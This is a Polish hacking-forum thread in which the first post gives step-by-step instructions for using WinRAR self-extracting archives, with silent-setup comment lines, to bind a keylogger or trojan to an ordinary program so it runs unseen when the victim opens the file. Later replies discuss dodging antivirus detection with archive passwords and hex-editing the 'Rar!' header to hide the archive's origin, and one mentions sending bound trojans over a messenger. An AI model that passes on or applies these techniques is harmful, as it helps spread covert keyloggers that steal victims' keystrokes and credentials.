Winrar binderem praktycznie do każdego roszerzenia!

[Exilek]

Witam!
Najprostszy binder jest w zasięgu twojej ręki! Wystarczy, że masz winrar'a i będziesz postępował według tych kroków:
1. wybierasz keylogger do zbindowania,
2. klikasz PPM na keylogger'a i wybierasz "dodaj do archiwum"
3. ustawiasz wszystko tak jak na ss'ie z tym, że wybierasz rozszerzenie pliku

4. przechodzisz w zakładkę comments i wpisujesz takie coś:

Silent=1

Setup=nazwa_programu_glownego_ktory_uruchamia_sie_przy_otwarciu.exe

Setup=nazwa_trojana_keyloggera_etc.exe

Path=%tmp%katalog_do_ktorego_sie_rozpakuje

5. spakowujesz i gotowe!
To by było na tyle

Pozdrawiam
Exilek

 

[HeadShot]

Jesli to dziala tak jak powinno to graty

:faja:

 

[3rr0rx]

keylogger.rozszerzenie do ktoergo chcesz zbindowac

i tak bedzie *rar a przy sfx'ie *exe

 

[HeadShot]

Originally posted by Error_PL

keylogger.rozszerzenie do ktoergo chcesz zbindowac

i tak bedzie *rar a przy sfx'ie *exe

To oczywiste, myslales ze bedzie .jpg ? ;]

 

[3rr0rx]

Originally posted by HeadShot+--><div class='quotetop'>CYTAT(HeadShot)</div>

<!--QuoteBegin-Error_PL

keylogger.rozszerzenie do ktoergo chcesz zbindowac

i tak bedzie *rar a przy sfx'ie *exe

To oczywiste, myslales ze bedzie .jpg ? ;][/b]

tja pewnie, i od razu wpadła mi mysl aby przez gg wysylac zbindowane trojany xD lol

 

[grzonu]

ale co ci to daje jak i tak jest wykrywalny nawet przez avasta

 

[LiL BLaCK 96]

Originally posted by grzonu
ale co ci to daje jak i tak jest wykrywalny nawet przez avasta

Przynajmniej unikniemy kolejnych pytań typu:
- jak się binduje przez WinRar'a ;]

 

[bait13]

spoko sposób tylko wykrywalność wszystko psuje :/

 

[Droid]

dla mnie ten sposób wydaje sie dosyc ciekawy, ale fakt wykrywalność i to jest wielki -

 

[Wojt5]

Ja mam pytanie jesli to jest wykrywalne to co to daje?

 

[amex]

nie kazdy ma av

 

[Exilek]

Originally posted by Error_PL

keylogger.rozszerzenie do ktoergo chcesz zbindowac

i tak bedzie *rar a przy sfx'ie *exe

Yhy czytanie ze zrozumieniem >.<
Wybierasz rozszerzenie!

 

[grzonu]

ja jednak zostane narazie przy zbinderze

 

[boorek]

Nie wiem czy to prawda slyszalem ze wystarczy ustawic haslo na archiwum i sfx staje sie niewykrywalny. ^^

 

[B33RK4]

Originally posted by boorek
Nie wiem czy to prawda slyszalem ze wystarczy ustawic haslo na archiwum i sfx staje sie niewykrywalny. ^^

Dobrze słyszałeś.

 

[Kanciastoporty]

Originally posted by boorek
Nie wiem czy to prawda slyszalem ze wystarczy ustawic haslo na archiwum i sfx staje sie niewykrywalny. ^^

niewykrywalny do momentu podania hasla
a bez podania hasla nie uruchomisz

 

[K1ll3r_]

Hmm temat nie jest taki stary, więc myślę, że nie będzie to tak złe, jeśli go podniosę

Czytam tak sobie ten temat i doszedłem do takiego wniosku:
1. Każdy plik spakowany rarem w format rar xD ma na początku pliku takie cuś: "Rar!"
2. Jeśli ktoś ma RAR'a i na SFX'a naciśnie prawym przyciskiem, to ukaże się tajemnicza pozycja "Otwórz przy pomocy WinRARa", a np. Skype nie pakuje swojego programu RARem...
3. Trza się tego było jakoś pozbyć

4. Otwieramy HEXem tego SFX'a i szukamy "Rar!" i zmieniamy np. na "Rae!"
5. RAR już nie wykmini, że to jego plik

Pozdro

 

[dioz]

Wszystko pieknie i ładnie ale czy napewno to zadziała.....czy jak zmienisz RAR na RAE to czy da sie to rozpakowac normalnie??musze spróbowac ale z tego co mi sie wydaje to jest tak samo jak exe zmienisz na ebe....nie sadze zeby ruszyło....jezeli działa to gratulacje
Pozdro

 

[mr_psychoo]

przeciez nie zmieniasz rozszerzenia tylko to "rar!" co dodaje sobie winrar zeby kojarzyc swoje programy (tak by przynajmniej wynikalo z postu wyzej...)

 

[K1ll3r_]

Dokładnie, mi chodziło nie o to żeby zmieniać rozszerzenie (no bez przesady...) tylko żeby jakimś hexem zmienić zawartość pliku - poszukać "Rar!" i zmienić na cokolwiek.